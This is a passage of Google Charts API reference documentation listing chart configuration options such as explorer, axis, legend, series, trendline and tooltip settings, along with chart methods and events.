axis: 'horizontal' }. Similarly for the vertical axis. • dragToZoom: The explorer's default behavior is to zoom in and out when the user scrolls. If explorer: { actions: ['dragToZoom', 'rightClickToReset'] } is used, dragging across a rectangular area zooms into that area. We recommend using rightClickToReset whenever dragToZoom is used. See explorer.maxZoomIn, explorer.maxZoomOut, and explorer.zoomDelta for zoom customizations. • rightClickToReset: Right clicking on the chart returns it to the original pan and zoom level. Type: Array of strings Default: ['dragToPan', 'rightClickToReset'] explorer.axis By default, users can pan both horizontally and vertically when the explorer option is used. If you want to users to only pan horizontally, use explorer: { axis: 'horizontal' }. Similarly, explorer: { axis: 'vertical' } enables vertical-only panning. Type: string Default: both horizontal and vertical panning explorer.keepInBounds By default, users can pan all around, regardless of where the data is. To ensure that users don't pan beyond the original chart, use explorer: { keepInBounds: true }. Type: boolean Default: false explorer.maxZoomIn The maximum that the explorer can zoom in. By default, users will be able to zoom in enough that they'll see only 25% of the original view. Setting explorer: { maxZoomIn: .5 } would let users zoom in only far enough to see half of the original view. Type: number Default: 0.25 explorer.maxZoomOut The maximum that the explorer can zoom out. By default, users will be able to zoom out far enough that the chart will take up only 1/4 of the available space. Setting explorer: { maxZoomOut: 8 } would let users zoom out far enough that the chart would take up only 1/8 of the available space. Type: number Default: 4 explorer.zoomDelta When users zoom in or out, explorer.zoomDelta determines how much they zoom by. The smaller the number, the smoother and slower the zoom. Type: number Default: 1.5 focusTarget The type of the entity that receives focus on mouse hover. Also affects which entity is selected by mouse click, and which data table element is associated with events. Can be one of the following: • 'datum' - Focus on a single data point. Correlates to a cell in the data table. • 'category' - Focus on a grouping of all data points along the major axis. Correlates to a row in the data table. In focusTarget 'category' the tooltip displays all the category values. This may be useful for comparing values of different series. Type: string Default: 'datum' fontSize The default font size, in pixels, of all text in the chart. You can override this using properties for specific chart elements. Type: number Default: automatic fontName The default font face for all text in the chart. You can override this using properties for specific chart elements. Type: string Default: 'Arial' forceIFrame Draws the chart inside an inline frame. (Note that on IE8, this option is ignored; all IE8 charts are drawn in i-frames.) Type: boolean Default: false hAxis An object with members to configure various horizontal axis elements. To specify properties of this object, you can use object literal notation, as shown here: { title: 'Hello', titleTextStyle: { color: '#FF0000' } } Type: object Default: null hAxis.baseline The baseline for the horizontal axis. This option is only supported for a continuous axis. Type: number Default: automatic hAxis.baselineColor The color of the baseline for the horizontal axis. Can be any HTML color string, for example: 'red' or '#00cc00'. This option is only supported for a continuous axis. Type: number Default: 'black' hAxis.direction The direction in which the values along the horizontal axis grow. Specify -1 to reverse the order of the values. Type: 1 or -1 Default: 1 hAxis.format A format string for numeric or date axis labels. For number axis labels, this is a subset of the decimal formatting ICU pattern set . For instance, {format:'#,###%'} will display values "1,000%", "750%", and "50%" for values 10, 7.5, and 0.5. You can also supply any of the following: • {format: 'none'}: displays numbers with no formatting (e.g., 8000000) • {format: 'decimal'}: displays numbers with thousands separators (e.g., 8,000,000) • {format: 'scientific'}: displays numbers in scientific notation (e.g., 8e6) • {format: 'currency'}: displays numbers in the local currency (e.g., $8,000,000.00) • {format: 'percent'}: displays numbers as percentages (e.g., 800,000,000%) • {format: 'short'}: displays abbreviated numbers (e.g., 8M) • {format: 'long'}: displays numbers as full words (e.g., 8 million) For date axis labels, this is a subset of the date formatting ICU pattern set . For instance, {format:'MMM d, y'} will display the value "Jul 1, 2011" for the date of July first in 2011. The actual formatting applied to the label is derived from the locale the API has been loaded with. For more details, see loading charts with a specific locale . This option is only supported for a continuous axis. Type: string Default: auto hAxis.gridlines An object with members to configure the gridlines on the horizontal axis. To specify properties of this object, you can use object literal notation, as shown here: {color: '#333', count: 4} This option is only supported for a continuous axis. Type: object Default: null hAxis.gridlines.color The color of the horizontal gridlines inside the chart area. Specify a valid HTML color string. Type: string Default: '#CCC' hAxis.gridlines.count The number of horizontal gridlines inside the chart area. Minimum value is 2. Specify -1 to automatically compute the number of gridlines. Type: number Default: 5 hAxis.gridlines.units Overrides the default format for various aspects of date/datetime/timeofday data types when used with chart computed gridlines. Allows formatting for years, months, days, hours, minutes, seconds, and milliseconds. General format is: gridlines: { units: { years: {format: [/*format strings here*/]}, months: {format: [/*format strings here*/]}, days: {format: [/*format strings here*/]} hours: {format: [/*format strings here*/]} minutes: {format: [/*format strings here*/]} seconds: {format: [/*format strings here*/]}, milliseconds: {format: [/*format strings here*/]}, } } Additional information can be found in Dates and Times. Type: object Default: null hAxis.minorGridlines An object with members to configure the minor gridlines on the horizontal axis, similar to the hAxis.gridlines option. This option is only supported for a continuous axis. Type: object Default: null hAxis.minorGridlines.color The color of the horizontal minor gridlines inside the chart area. Specify a valid HTML color string. Type: string Default: A blend of the gridline and background colors hAxis.minorGridlines.count The number of horizontal minor gridlines between two regular gridlines. Type: number Default: 0 hAxis.minorGridlines.units Overrides the default format for various aspects of date/datetime/timeofday data types when used with chart computed minorGridlines. Allows formatting for years, months, days, hours, minutes, seconds, and milliseconds. General format is: gridlines: { units: { years: {format: [/*format strings here*/]}, months: {format: [/*format strings here*/]}, days: {format: [/*format strings here*/]} hours: {format: [/*format strings here*/]} minutes: {format: [/*format strings here*/]} seconds: {format: [/*format strings here*/]}, milliseconds: {format: [/*format strings here*/]}, } } Additional information can be found in Dates and Times. Type: object Default: null hAxis.logScale hAxis property that makes the horizontal axis a logarithmic scale (requires all values to be positive). Set to true for yes. This option is only supported for a continuous axis. Type: boolean Default: false hAxis.scaleType hAxis property that makes the horizontal axis a logarithmic scale. Can be one of the following: • null - No logarithmic scaling is performed. • 'log' - Logarithmic scaling. Negative and zero values are not plotted. This option is the same as setting hAxis: { logscale: true }. • 'mirrorLog' - Logarithmic scaling in which negative and zero values are plotted. The plotted value of a negative number is the negative of the log of the absolute value. Values close to 0 are plotted on a linear scale. This option is only supported for a continuous axis. Type: string Default: null hAxis.textPosition Position of the horizontal axis text, relative to the chart area. Supported values: 'out', 'in', 'none'. Type: string Default: 'out' hAxis.textStyle An object that specifies the horizontal axis text style. The object has this format: { color: <string>, fontName: <string>, fontSize: <number>, bold: <boolean>, italic: <boolean> } The color can be any HTML color string, for example: 'red' or '#00cc00'. Also see fontName and fontSize. Type: object Default: {color: 'black', fontName: <global-font-name>, fontSize: <global-font-size>} hAxis.ticks Replaces the automatically generated X-axis ticks with the specified array. Each element of the array should be either a valid tick value (such as a number, date, datetime, or timeofday), or an object. If it's an object, it should have a v property for the tick value, and an optional f property containing the literal string to be displayed as the label. Examples: • hAxis: { ticks: [5,10,15,20] } • hAxis: { ticks: [{v:32, f:'thirty two'}, {v:64, f:'sixty four'}] } • hAxis: { ticks: [new Date(2014,3,15), new Date(2013,5,15)] } • hAxis: { ticks: [16, {v:32, f:'thirty two'}, {v:64, f:'sixty four'}, 128] } This option is only supported for a continuous axis. Type: Array of elements Default: auto hAxis.title hAxis property that specifies the title of the horizontal axis. Type: string Default: null hAxis.titleTextStyle An object that specifies the horizontal axis title text style. The object has this format: { color: <string>, fontName: <string>, fontSize: <number>, bold: <boolean>, italic: <boolean> } The color can be any HTML color string, for example: 'red' or '#00cc00'. Also see fontName and fontSize. Type: object Default: {color: 'black', fontName: <global-font-name>, fontSize: <global-font-size>} hAxis.allowContainerBoundaryTextCufoff If false, will hide outermost labels rather than allow them to be cropped by the chart container. If true, will allow label cropping. This option is only supported for a discrete axis. Type: boolean Default: false hAxis.slantedText If true, draw the horizontal axis text at an angle, to help fit more text along the axis; if false, draw horizontal axis text upright. Default behavior is to slant text if it cannot all fit when drawn upright. Notice that this option is available only when the hAxis.textPosition is set to 'out' (which is the default). This option is only supported for a discrete axis. Type: boolean Default: automatic hAxis.slantedTextAngle The angle of the horizontal axis text, if it's drawn slanted. Ignored if hAxis.slantedText is false, or is in auto mode, and the chart decided to draw the text horizontally. This option is only supported for a discrete axis. Type: number, 1—90 Default: 30 hAxis.maxAlternation Maximum number of levels of horizontal axis text. If axis text labels become too crowded, the server might shift neighboring labels up or down in order to fit labels closer together. This value specifies the most number of levels to use; the server can use fewer levels, if labels can fit without overlapping. This option is only supported for a discrete axis. Type: number Default: 2 hAxis.maxTextLines Maximum number of lines allowed for the text labels. Labels can span multiple lines if they are too long, and the number of lines is, by default, limited by the height of the available space. This option is only supported for a discrete axis. Type: number Default: auto hAxis.minTextSpacing Minimum horizontal spacing, in pixels, allowed between two adjacent text labels. If the labels are spaced too densely, or they are too long, the spacing can drop below this threshold, and in this case one of the label-unclutter measures will be applied (e.g, truncating the lables or dropping some of them). This option is only supported for a discrete axis. Type: number Default: The value of hAxis.textStyle.fontSize hAxis.showTextEvery How many horizontal axis labels to show, where 1 means show every label, 2 means show every other label, and so on. Default is to try to show as many labels as possible without overlapping. This option is only supported for a discrete axis. Type: number Default: automatic hAxis.maxValue Moves the max value of the horizontal axis to the specified value; this will be rightward in most charts. Ignored if this is set to a value smaller than the maximum x-value of the data. hAxis.viewWindow.max overrides this property. This option is only supported for a continuous axis. Type: number Default: automatic hAxis.minValue Moves the min value of the horizontal axis to the specified value; this will be leftward in most charts. Ignored if this is set to a value greater than the minimum x-value of the data. hAxis.viewWindow.min overrides this property. This option is only supported for a continuous axis. Type: number Default: automatic hAxis.viewWindowMode Specifies how to scale the horizontal axis to render the values within the chart area. The following string values are supported: • 'pretty' - Scale the horizontal values so that the maximum and minimum data values are rendered a bit inside the left and right of the chart area. This will cause haxis.viewWindow.min and haxis.viewWindow.max to be ignored. • 'maximized' - Scale the horizontal values so that the maximum and minimum data values touch the left and right of the chart area. This will cause haxis.viewWindow.min and haxis.viewWindow.max to be ignored. • 'explicit' - A deprecated option for specifying the left and right scale values of the chart area. (Deprecated because it's redundant with haxis.viewWindow.min and haxis.viewWindow.max.) Data values outside these values will be cropped. You must specify an hAxis.viewWindow object describing the maximum and minimum values to show. This option is only supported for a continuous axis. Type: string Default: Equivalent to 'pretty', but haxis.viewWindow.min and haxis.viewWindow.max take precedence if used. hAxis.viewWindow Specifies the cropping range of the horizontal axis. Type: object Default: null hAxis.viewWindow.max • For a continuous axis: The maximum horizontal data value to render. • For a discrete axis: The zero-based row index where the cropping window ends. Data points at this index and higher will be cropped out. In conjunction with vAxis.viewWindowMode.min, it defines a half-opened range [min, max) that denotes the element indices to display. In other words, every index such that min <= index < max will be displayed. Ignored when hAxis.viewWindowMode is 'pretty' or 'maximized'. Type: number Default: auto hAxis.viewWindow.min • For a continuous axis: The minimum horizontal data value to render. • For a discrete axis: The zero-based row index where the cropping window begins. Data points at indices lower than this will be cropped out. In conjunction with vAxis.viewWindowMode.max, it defines a half-opened range [min, max) that denotes the element indices to display. In other words, every index such that min <= index < max will be displayed. Ignored when hAxis.viewWindowMode is 'pretty' or 'maximized'. Type: number Default: auto height Height of the chart, in pixels. Type: number Default: height of the containing element interpolateNulls Whether to guess the value of missing points. If true, it will guess the value of any missing data based on neighboring points. If false, it will leave a break in the line at the unknown point. This is not supported by Area charts with the isStacked: true/'percent'/'relative'/'absolute' option. Type: boolean Default: false legend An object with members to configure various aspects of the legend. To specify properties of this object, you can use object literal notation, as shown here: {position: 'top', textStyle: {color: 'blue', fontSize: 16}} Type: object Default: null legend.alignment Alignment of the legend. Can be one of the following: • 'start' - Aligned to the start of the area allocated for the legend. • 'center' - Centered in the area allocated for the legend. • 'end' - Aligned to the end of the area allocated for the legend. Start, center, and end are relative to the style -- vertical or horizontal -- of the legend. For example, in a 'right' legend, 'start' and 'end' are at the top and bottom, respectively; for a 'top' legend, 'start' and 'end' would be at the left and right of the area, respectively. The default value depends on the legend's position. For 'bottom' legends, the default is 'center'; other legends default to 'start'. Type: string Default: automatic legend.maxLines Maximum number of lines in the legend. Set this to a number greater than one to add lines to your legend. Note: The exact logic used to determine the actual number of lines rendered is still in flux. This option currently works only when legend.position is 'top'. Type: number Default: 1 legend.position Position of the legend. Can be one of the following: • 'bottom' - Below the chart. • 'left' - To the left of the chart, provided the left axis has no series associated with it. So if you want the legend on the left, use the option targetAxisIndex: 1. • 'in' - Inside the chart, by the top left corner. • 'none' - No legend is displayed. • 'right' - To the right of the chart. Incompatible with the vAxes option. • 'top' - Above the chart. Type: string Default: 'right' legend.textStyle An object that specifies the legend text style. The object has this format: { color: <string>, fontName: <string>, fontSize: <number>, bold: <boolean>, italic: <boolean> } The color can be any HTML color string, for example: 'red' or '#00cc00'. Also see fontName and fontSize. Type: object Default: {color: 'black', fontName: <global-font-name>, fontSize: <global-font-size>} lineDashStyle The on-and-off pattern for dashed lines. For instance, [4, 4] will repeat 4-length dashes followed by 4-length gaps, and [5, 1, 3] will repeat a 5-length dash, a 1-length gap, a 3-length dash, a 5-length gap, a 1-length dash, and a 3-length gap. See Dashed Lines for more information. Type: Array of numbers Default: null lineWidth Data line width in pixels. Use zero to hide all lines and show only the points. You can override values for individual series using the series property. Type: number Default: 2 orientation The orientation of the chart. When set to 'vertical', rotates the axes of the chart so that (for instance) a column chart becomes a bar chart, and an area chart grows rightward instead of up: Type: string Default: 'horizontal' pointShape The shape of individual data elements: 'circle', 'triangle', 'square', 'diamond', 'star', or 'polygon'. See the points documentation for examples. Type: string Default: 'circle' pointSize Diameter of displayed points in pixels. Use zero to hide all points. You can override values for individual series using the series property. If you're using a trendline, the pointSize option will affect the width of the trendline unless you override it with the trendlines.n.pointsize option. Type: number Default: 0 pointsVisible Determines whether points will be displayed. Set to false to hide all points. You can override values for individual series using the series property. If you're using a trendline, the pointsVisible option will affect the visibility of the points on all trendlines unless you override it with the trendlines.n.pointsVisible option. This can also be overridden using the style role in the form of "point {visible: true}". Type: boolean Default: true reverseCategories If set to true, will draw series from right to left. The default is to draw left-to-right. This option is only supported for a discrete major axis. Type: boolean Default: false selectionMode When selectionMode is 'multiple', users may select multiple data points. Type: string Default: 'single' series An array of objects, each describing the format of the corresponding series in the chart. To use default values for a series, specify an empty object {}. If a series or a value is not specified, the global value will be used. Each object supports the following properties: • annotations - An object to be applied to annotations for this series. This can be used to control, for instance, the textStyle for the series: series: { 0: { annotations: { textStyle: {fontSize: 12, color: 'red' } } } } See the various annotations options for a more complete list of what can be customized. • color - The color to use for this series. Specify a valid HTML color string. • curveType - Overrides the global curveType value for this series. • labelInLegend - The description of the series to appear in the chart legend. • lineDashStyle - Overrides the global lineDashStyle value for this series. • lineWidth - Overrides the global lineWidth value for this series. • pointShape - Overrides the global pointShape value for this series. • pointSize - Overrides the global pointSize value for this series. • pointsVisible - Overrides the global pointsVisible value for this series. • targetAxisIndex - Which axis to assign this series to, where 0 is the default axis, and 1 is the opposite axis. Default value is 0; set to 1 to define a chart where different series are rendered against different axes. At least one series much be allocated to the default axis. You can define a different scale for different axes. • visibleInLegend - A boolean value, where true means that the series should have a legend entry, and false means that it should not. Default is true. You can specify either an array of objects, each of which applies to the series in the order given, or you can specify an object where each child has a numeric key indicating which series it applies to. For example, the following two declarations are identical, and declare the first series as black and absent from the legend, and the fourth as red and absent from the legend: series: [ {color: 'black', visibleInLegend: false}, {}, {}, {color: 'red', visibleInLegend: false} ] series: { 0:{color: 'black', visibleInLegend: false}, 3:{color: 'red', visibleInLegend: false} } Type: Array of objects, or object with nested objects Default: {} theme A theme is a set of predefined option values that work together to achieve a specific chart behavior or visual effect. Currently only one theme is available: • 'maximized' - Maximizes the area of the chart, and draws the legend and all of the labels inside the chart area. Sets the following options: chartArea: {width: '100%', height: '100%'}, legend: {position: 'in'}, titlePosition: 'in', axisTitlesPosition: 'in', hAxis: {textPosition: 'in'}, vAxis: {textPosition: 'in'} Type: string Default: null title Text to display above the chart. Type: string Default: no title titlePosition Where to place the chart title, compared to the chart area. Supported values: • in - Draw the title inside the chart area. • out - Draw the title outside the chart area. • none - Omit the title. Type: string Default: 'out' titleTextStyle An object that specifies the title text style. The object has this format: { color: <string>, fontName: <string>, fontSize: <number>, bold: <boolean>, italic: <boolean> } The color can be any HTML color string, for example: 'red' or '#00cc00'. Also see fontName and fontSize. Type: object Default: {color: 'black', fontName: <global-font-name>, fontSize: <global-font-size>} tooltip An object with members to configure various tooltip elements. To specify properties of this object, you can use object literal notation, as shown here: {textStyle: {color: '#FF0000'}, showColorCode: true} Type: object Default: null tooltip.ignoreBounds If set to true, allows the drawing of tooltips to flow outside of the bounds of the chart on all sides. Note: This only applies to HTML tooltips. If this is enabled with SVG tooltips, any overflow outside of the chart bounds will be cropped. See Customizing Tooltip Content for more details. Type: boolean Default: false tooltip.isHtml If set to true, use HTML-rendered (rather than SVG-rendered) tooltips. See Customizing Tooltip Content for more details. Note: customization of the HTML tooltip content via the tooltip column data role is not supported by the Bubble Chart visualization. Type: boolean Default: false tooltip.showColorCode If true, show colored squares next to the series information in the tooltip. The default is true when focusTarget is set to 'category', otherwise the default is false. Type: boolean Default: automatic tooltip.textStyle An object that specifies the tooltip text style. The object has this format: { color: <string>, fontName: <string>, fontSize: <number>, bold: <boolean>, italic: <boolean> } The color can be any HTML color string, for example: 'red' or '#00cc00'. Also see fontName and fontSize. Type: object Default: {color: 'black', fontName: <global-font-name>, fontSize: <global-font-size>} tooltip.trigger The user interaction that causes the tooltip to be displayed: • 'focus' - The tooltip will be displayed when the user hovers over the element. • 'none' - The tooltip will not be displayed. • 'selection' - The tooltip will be displayed when the user selects the element. Type: string Default: 'focus' trendlines Displays trendlines on the charts that support them. By default, linear trendlines are used, but this can be customized with the trendlines.n.type option. Trendlines are specified on a per-series basis, so most of the time your options will look like this: var options = { trendlines: { 0: { type: 'linear', color: 'green', lineWidth: 3, opacity: 0.3, showR2: true, visibleInLegend: true } } } Type: object Default: null trendlines.n.color The color of the trendline , expressed as either an English color name or a hex string. Type: string Default: default series color trendlines.n.degree For trendlines of type: 'polynomial', the degree of the polynomial (2 for quadratic, 3 for cubic, and so on). (The default degree may change from 3 to 2 in an upcoming release of Google Charts.) Type: number Default: 3 trendlines.n.labelInLegend If set, the trendline will appear in the legend as this string. Type: string Default: null trendlines.n.lineWidth The line width of the trendline , in pixels. Type: number Default: 2 trendlines.n.opacity The transparency of the trendline , from 0.0 (transparent) to 1.0 (opaque). Type: number Default: 1.0 trendlines.n.pointSize Trendlines are constucted by stamping a bunch of dots on the chart; this rarely-needed option lets you customize the size of the dots. The trendline's lineWidth option will usually be preferable. However, you'll need this option if you're using the global pointSize option and want a different point size for your trendlines. Type: number Default: 1 trendlines.n.pointsVisible Trendlines are constucted by stamping a bunch of dots on the chart. The trendline's pointsVisible option determines whether the points for a particular trendline are visible. Type: boolean Default: true trendlines.n.showR2 Whether to show the coefficient of determination in the legend or trendline tooltip. Type: boolean Default: false trendlines.n.type Whether the trendlines is 'linear' (the default), 'exponential', or 'polynomial'. Type: string Default: linear trendlines.n.visibleInLegend Whether the trendline equation appears in the legend. (It will appear in the trendline tooltip.) Type: boolean Default: false vAxes Specifies properties for individual vertical axes, if the chart has multiple vertical axes. Each child object is a vAxis object, and can contain all the properties supported by vAxis. These property values override any global settings for the same property. To specify a chart with multiple vertical axes, first define a new axis using series.targetAxisIndex, then configure the axis using vAxes. The following example assigns series 2 to the right axis and specifies a custom title and text style for it: { series: { 2: { targetAxisIndex:1 } }, vAxes: { 1: { title:'Losses', textStyle: {color: 'red'} } } } This property can be either an object or an array: the object is a collection of objects, each with a numeric label that specifies the axis that it defines--this is the format shown above; the array is an array of objects, one per axis. For example, the following array-style notation is identical to the vAxis object shown above: vAxes: [ {}, // Nothing specified for axis 0 { title:'Losses', textStyle: {color: 'red'} // Axis 1 } ] Type: Array of object, or object with child objects Default: null vAxis An object with members to configure various vertical axis elements. To specify properties of this object, you can use object literal notation, as shown here: {title: 'Hello', titleTextStyle: {color: '#FF0000'}} Type: object Default: null vAxis.baseline vAxis property that specifies the baseline for the vertical axis. If the baseline is larger than the highest grid line or smaller than the lowest grid line, it will be rounded to the closest gridline. Type: number Default: automatic vAxis.baselineColor Specifies the color of the baseline for the vertical axis. Can be any HTML color string, for example: 'red' or '#00cc00'. Type: number Default: 'black' vAxis.direction The direction in which the values along the vertical axis grow. Specify -1 to reverse the order of the values. Type: 1 or -1 Default: 1 vAxis.format A format string for numeric axis labels. This is a subset of the ICU pattern set . For instance, {format:'#,###%'} will display values "1,000%", "750%", and "50%" for values 10, 7.5, and 0.5. You can also supply any of the following: • {format: 'none'}: displays numbers with no formatting (e.g., 8000000) • {format: 'decimal'}: displays numbers with thousands separators (e.g., 8,000,000) • {format: 'scientific'}: displays numbers in scientific notation (e.g., 8e6) • {format: 'currency'}: displays numbers in the local currency (e.g., $8,000,000.00) • {format: 'percent'}: displays numbers as percentages (e.g., 800,000,000%) • {format: 'short'}: displays abbreviated numbers (e.g., 8M) • {format: 'long'}: displays numbers as full words (e.g., 8 million) The actual formatting applied to the label is derived from the locale the API has been loaded with. For more details, see loading charts with a specific locale . Type: string Default: auto vAxis.gridlines An object with members to configure the gridlines on the vertical axis. To specify properties of this object, you can use object literal notation, as shown here: {color: '#333', count: 4} Type: object Default: null vAxis.gridlines.color The color of the vertical gridlines inside the chart area. Specify a valid HTML color string. Type: string Default: '#CCC' vAxis.gridlines.count The number of vertical gridlines inside the chart area. Minimum value is 2. Specify -1 to automatically compute the number of gridlines. Type: number Default: 5 vAxis.gridlines.units Overrides the default format for various aspects of date/datetime/timeofday data types when used with chart computed gridlines. Allows formatting for years, months, days, hours, minutes, seconds, and milliseconds. General format is: gridlines: { units: { years: {format: [/*format strings here*/]}, months: {format: [/*format strings here*/]}, days: {format: [/*format strings here*/]} hours: {format: [/*format strings here*/]} minutes: {format: [/*format strings here*/]} seconds: {format: [/*format strings here*/]}, milliseconds: {format: [/*format strings here*/]}, } } Additional information can be found in Dates and Times. Type: object Default: null vAxis.minorGridlines An object with members to configure the minor gridlines on the vertical axis, similar to the vAxis.gridlines option. Type: object Default: null vAxis.minorGridlines.color The color of the vertical minor gridlines inside the chart area. Specify a valid HTML color string. Type: string Default: A blend of the gridline and background colors vAxis.minorGridlines.count The number of vertical minor gridlines between two regular gridlines. Type: number Default: 0 vAxis.minorGridlines.units Overrides the default format for various aspects of date/datetime/timeofday data types when used with chart computed minorGridlines. Allows formatting for years, months, days, hours, minutes, seconds, and milliseconds. General format is: gridlines: { units: { years: {format: [/*format strings here*/]}, months: {format: [/*format strings here*/]}, days: {format: [/*format strings here*/]} hours: {format: [/*format strings here*/]} minutes: {format: [/*format strings here*/]} seconds: {format: [/*format strings here*/]}, milliseconds: {format: [/*format strings here*/]}, } } Additional information can be found in Dates and Times. Type: object Default: null vAxis.logScale If true, makes the vertical axis a logarithmic scale. Note: All values must be positive. Type: boolean Default: false vAxis.scaleType vAxis property that makes the vertical axis a logarithmic scale. Can be one of the following: • null - No logarithmic scaling is performed. • 'log' - Logarithmic scaling. Negative and zero values are not plotted. This option is the same as setting vAxis: { logscale: true }. • 'mirrorLog' - Logarithmic scaling in which negative and zero values are plotted. The plotted value of a negative number is the negative of the log of the absolute value. Values close to 0 are plotted on a linear scale. This option is only supported for a continuous axis. Type: string Default: null vAxis.textPosition Position of the vertical axis text, relative to the chart area. Supported values: 'out', 'in', 'none'. Type: string Default: 'out' vAxis.textStyle An object that specifies the vertical axis text style. The object has this format: { color: <string>, fontName: <string>, fontSize: <number>, bold: <boolean>, italic: <boolean> } The color can be any HTML color string, for example: 'red' or '#00cc00'. Also see fontName and fontSize. Type: object Default: {color: 'black', fontName: <global-font-name>, fontSize: <global-font-size>} vAxis.ticks Replaces the automatically generated Y-axis ticks with the specified array. Each element of the array should be either a valid tick value (such as a number, date, datetime, or timeofday), or an object. If it's an object, it should have a v property for the tick value, and an optional f property containing the literal string to be displayed as the label. Examples: • vAxis: { ticks: [5,10,15,20] } • vAxis: { ticks: [{v:32, f:'thirty two'}, {v:64, f:'sixty four'}] } • vAxis: { ticks: [new Date(2014,3,15), new Date(2013,5,15)] } • vAxis: { ticks: [16, {v:32, f:'thirty two'}, {v:64, f:'sixty four'}, 128] } Type: Array of elements Default: auto vAxis.title vAxis property that specifies a title for the vertical axis. Type: string Default: no title vAxis.titleTextStyle An object that specifies the vertical axis title text style. The object has this format: { color: <string>, fontName: <string>, fontSize: <number>, bold: <boolean>, italic: <boolean> } The color can be any HTML color string, for example: 'red' or '#00cc00'. Also see fontName and fontSize. Type: object Default: {color: 'black', fontName: <global-font-name>, fontSize: <global-font-size>} vAxis.maxValue Moves the max value of the vertical axis to the specified value; this will be upward in most charts. Ignored if this is set to a value smaller than the maximum y-value of the data. vAxis.viewWindow.max overrides this property. Type: number Default: automatic vAxis.minValue Moves the min value of the vertical axis to the specified value; this will be downward in most charts. Ignored if this is set to a value greater than the minimum y-value of the data. vAxis.viewWindow.min overrides this property. Type: number Default: null vAxis.viewWindowMode Specifies how to scale the vertical axis to render the values within the chart area. The following string values are supported: • 'pretty' - Scale the vertical values so that the maximum and minimum data values are rendered a bit inside the top and bottom of the chart area. This will cause vaxis.viewWindow.min and vaxis.viewWindow.max to be ignored. • 'maximized' - Scale the vertical values so that the maximum and minimum data values touch the top and bottom of the chart area. This will cause vaxis.viewWindow.min and vaxis.viewWindow.max to be ignored. • 'explicit' - A deprecated option for specifying the top and bottom scale values of the chart area. (Deprecated because it's redundant with vaxis.viewWindow.min and vaxis.viewWindow.max. Data values outside these values will be cropped. You must specify a vAxis.viewWindow object describing the maximum and minimum values to show. Type: string Default: Equivalent to 'pretty', but vaxis.viewWindow.min and vaxis.viewWindow.max take precedence if used. vAxis.viewWindow Specifies the cropping range of the vertical axis. Type: object Default: null vAxis.viewWindow.max The maximum vertical data value to render. Ignored when vAxis.viewWindowMode is 'pretty' or 'maximized'. Type: number Default: auto vAxis.viewWindow.min The minimum horizontal data value to render. Ignored when vAxis.viewWindowMode is 'pretty' or 'maximized'. Type: number Default: auto width Width of the chart, in pixels. Type: number Default: width of the containing element Methods Method draw(data, options) Draws the chart. The chart accepts further method calls only after the readyevent is fired. Extended description. Return Type: none getAction(actionID) Returns the tooltip action object with the requested actionID. Return Type: object getBoundingBox(id) Returns an object containing the left, top, width, and height of chart element id. The format for id isn't yet documented (they're the return values of event handlers), but here are some examples: var cli = chart.getChartLayoutInterface(); Height of the chart area cli.getBoundingBox('chartarea').height Width of the third bar in the first series of a bar or column chart cli.getBoundingBox('bar#0#2').width Bounding box of the fifth wedge of a pie chart cli.getBoundingBox('slice#4') Bounding box of the chart data of a vertical (e.g., column) chart: cli.getBoundingBox('vAxis#0#gridline') Bounding box of the chart data of a horizontal (e.g., bar) chart: cli.getBoundingBox('hAxis#0#gridline') Values are relative to the container of the chart. Call this after the chart is drawn. Return Type: object getChartAreaBoundingBox() Returns an object containing the left, top, width, and height of the chart content (i.e., excluding labels and legend): var cli = chart.getChartLayoutInterface(); cli.getChartAreaBoundingBox().left cli.getChartAreaBoundingBox().top cli.getChartAreaBoundingBox().height cli.getChartAreaBoundingBox().width Values are relative to the container of the chart. Call this after the chart is drawn. Return Type: object getChartLayoutInterface() Returns an object containing information about the onscreen placement of the chart and its elements. The following methods can be called on the returned object: • getBoundingBox • getChartAreaBoundingBox • getHAxisValue • getVAxisValue • getXLocation • getYLocation Call this after the chart is drawn. Return Type: object getHAxisValue(position, optional_axis_index) Returns the logical horizontal value at position, which is an offset from the chart container's left edge. Can be negative. Example: chart.getChartLayoutInterface().getHAxisValue(400). Call this after the chart is drawn. Return Type: number getImageURI() Returns the chart serialized as an image URI. Call this after the chart is drawn. See Printing PNG Charts. Return Type: string getSelection() Returns an array of the selected chart entities. Selectable entities are points, annotations, legend entries and categories. A point or annotation corresponds to a cell in the data table, a legend entry to a column (row index is null), and a category to a row (column index is null). For this chart, only one entity can be selected at any given moment. Extended description . Return Type: Array of selection elements getVAxisValue(position, optional_axis_index) Returns the logical vertical value at position, which is an offset from the chart container's top edge. Can be negative. Example: chart.getChartLayoutInterface().getVAxisValue(300). Call this after the chart is drawn. Return Type: number getXLocation(position, optional_axis_index) Returns the screen x-coordinate of position relative to the chart's container. Example: chart.getChartLayoutInterface().getXLocation(400). Call this after the chart is drawn. Return Type: number getYLocation(position, optional_axis_index) Returns the screen y-coordinate of position relative to the chart's container. Example: chart.getChartLayoutInterface().getYLocation(300). Call this after the chart is drawn. Return Type: number removeAction(actionID) Removes the tooltip action with the requested actionID from the chart. Return Type: none setAction(action) Sets a tooltip action to be executed when the user clicks on the action text. The setAction method takes an object as its action parameter. This object should specify 3 properties: id— the ID of the action being set, text —the text that should appear in the tooltip for the action, and action — the function that should be run when a user clicks on the action text. Any and all tooltip actions should be set prior to calling the chart's draw() method. Extended description. Return Type: none setSelection() Selects the specified chart entities. Cancels any previous selection. Selectable entities are points, annotations, legend entries and categories. A point or annotation corresponds to a cell in the data table, a legend entry to a column (row index is null), and a category to a row (column index is null). For this chart, only one entity can be selected at a time. Extended description . Return Type: none clearChart() Clears the chart, and releases all of its allocated resources. Return Type: none Events For more information on how to use these events, see Basic Interactivity, Handling Events, and Firing Events. Name animationfinish Fired when transition animation is complete. Properties: none click Fired when the user clicks inside the chart. Can be used to identify when the title, data elements, legend entries, axes, gridlines, or labels are clicked. Properties: targetID error Fired when an error occurs when attempting to render the chart. Properties: id, message onmouseover Fired when the user mouses over a visual entity. Passes back the row and column indices of the corresponding data table element. Properties: row, column onmouseout Fired when the user mouses away from a visual entity. Passes back the row and column indices of the corresponding data table element. Properties: row, column ready The chart is ready for external method calls. If you want to interact with the chart, and call methods after you draw it, you should set up a listener for this event before you call the draw method, and call them only after the event was fired. Properties: none select Fired when the user clicks a visual entity. To learn what has been selected, call getSelection(). Properties: none Data Policy All code and data are processed and rendered in the browser. No data is sent to any server. Send feedback about...
__label__pos
0.642616
